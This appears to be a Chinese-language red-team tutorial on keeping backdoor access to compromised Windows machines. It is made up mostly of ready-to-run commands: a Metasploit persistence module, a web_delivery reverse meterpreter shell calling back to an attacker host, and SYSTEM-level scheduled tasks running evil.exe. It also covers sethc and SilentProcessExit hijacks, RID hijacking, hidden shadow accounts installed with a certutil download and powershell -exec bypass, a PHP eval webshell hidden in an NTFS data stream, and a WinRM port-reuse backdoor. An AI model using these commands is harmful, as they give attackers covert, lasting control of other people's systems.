msf persistence模块
向目标主机的注册表添加键值,使后门程序开机自启
meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.80.145
image.png
userinit注册表后门
Userinit注册表键的作用是用户在进行登陆时,WinLogon进程运行指定的程序,可以更改它的值来添加与删除程序。具体键值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit优先于很多杀软启动,通过调用powershell(例如web_delivery模块),可以做到无文件落地,实现一定程度的免杀效果。
exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.80.167
run
image.png
Logon Scripts
优先于杀软启动,和userinit类似,但是需要在目标磁盘上留下文件,隐蔽性不佳。注册表位置:
HKEY_CURRENT_USER\Environment\
创建字符串键值: UserInitMprLogonScript
键值设置为后门的绝对路径 C:\1.bat
image.png
计划任务
- at命令
net time \\192.168.80.80
at \\192.168.80.80 11:34 c:/evil.exe
at \\192.168.80.80
at \\192.168.80.80 1 /del
- schtasks命令
- /RL 指定运行级别(LIMITED和HIGHEST,默认LIMITED)
- /F 强制创建
- /RU 指定用户权限
- /TN 指定任务名称
- /TR 指定路径和文件名
schtasks /create /RL HIGHEST /F /RU SYSTEM /TN TestService1 /SC DAILY /ST 14:17 /TR c:/evil.exe 以system用户创建计划任务
schtasks /create /F /TN TestService1 /SC DAILY /ST 14:17 /TR c:/evil.exe 以普通用户创建计划任务
schtasks /query | findstr "Test" 查询计划任务
schtasks /run /TN TestService1 手动运行
schtasks /F /delete /TN "TestService1" 删除计划任务
映像劫持
- 实现效果:运行A程序,实际运行的却是B程序
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /d "C:\Users\Administrator\Desktop\a.exe" /f
image.png
此时,登录按5次shift键即可上线cs。
- 实现效果:关闭A程序,B程序却被打开了
- 使用微软官方工具
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools_amd64/dbg_amd64.msi
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools/dbg_x86.msi
image.png
- 使用管理员用户添加注册表
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Users\Administrator\Desktop\evil.exe"
此时关闭记事本,会上线cs。
RID劫持
原理
在注册表中(HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account),把普通用户的键值修改为管理员用户的键值,以实现登录普通用户,可以使用管理员用户的权限。有些条件下我们不方便修改Administrator的密码,又得不到密码的情况下,可以使用这种方式登陆administrator的桌面环境。利用场景
启用guest用户,修改RID;登录guest用户,获得高权限msf中有对应的模块
use post/windows/manage/rid_hijack
set guest_account true
set session 1
exploit
image.png
- 此时使用psexec登录guest用户即为system权限
image.png
影子账户
- 原理
通过修改注册表,克隆已有账户的权限。
实现的效果是:net user看不到用户、计算机管理看不到用户、注册表里能看到用户,但是重启后计算机管理里还是会出现。
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1
powershell -exec bypass -File Windows-User-Clone.ps1
image.png
利用NTFS ADS流隐藏webshell
- 创建ads数据流文件
echo ^<?php @eval($_POST['cmd']);?^> > phpinfo.php:hidden.jpg
此时使用dir看不到该文件,使用dir /r才可以看到
image.png
或者使用notepad打开能看到文件内容
notepad phpinfo.php:hidden.jpg
image.png
- 利用文件包含制作webshell
使用一个正常的php文件把ADS数据流文件include进去,即可解析一句话代码
<?php include('phpinfo.php:hidden.jpg')?>
image.png
image.png
- 如何删除ads数据流文件?
直接删除宿主文件即可
组策略设置脚本启动
通过gpedit.msc组策略设置"脚本(启动/关机)"、"脚本(登录/注销)"
image.png
端口复用
在安装了IIS的Windows服务器上,通过WinRM服务,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。
- 配置端口复用后门
- 对于Windows 2008系统,需要先使用命令启动WinRM服务,然后将winrm服务的端口修改为80
winrm e winrm/config/listener 查看WinRM服务的状态,未启动则返回空
winrm quickconfig -q 启动WinRM服务
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
- 对于Windows 2012系统,WinRM服务默认启动并监听了5985端口,直接使用以下命令新增一个80端口的listener即可实现端口复用
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
- 连接后门
- 首先启动WinRM服务,并设置信任连接的主机
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="192.168.80.80"}
- 然后使用winrs命令连接远程WinRM服务执行命令
winrs -r:http://192.168.80.80 -u:administrator -p:1qaz!QAZ whoami
winrs -r:http://192.168.80.80 -u:administrator -p:1qaz!QAZ cmd 获得交互式shell
image.png
3.需要注意的点
- WinRM服务受UAC限制,所以只有administrator可以登录,要想允许本地管理员组的其他用户登录WinRM,需要修改注册表设置。
- 使用系统自带的winrs命令登录需要明文账号密码,很多场景下尤其是windows 2012以后,通常只能抓取到本地用户密码的hash值,这时需要使用支持NTLM hash登录的客户端进行连接。
参考:
https://www.secpulse.com/archives/103301.html
https://paper.seebug.org/1004/
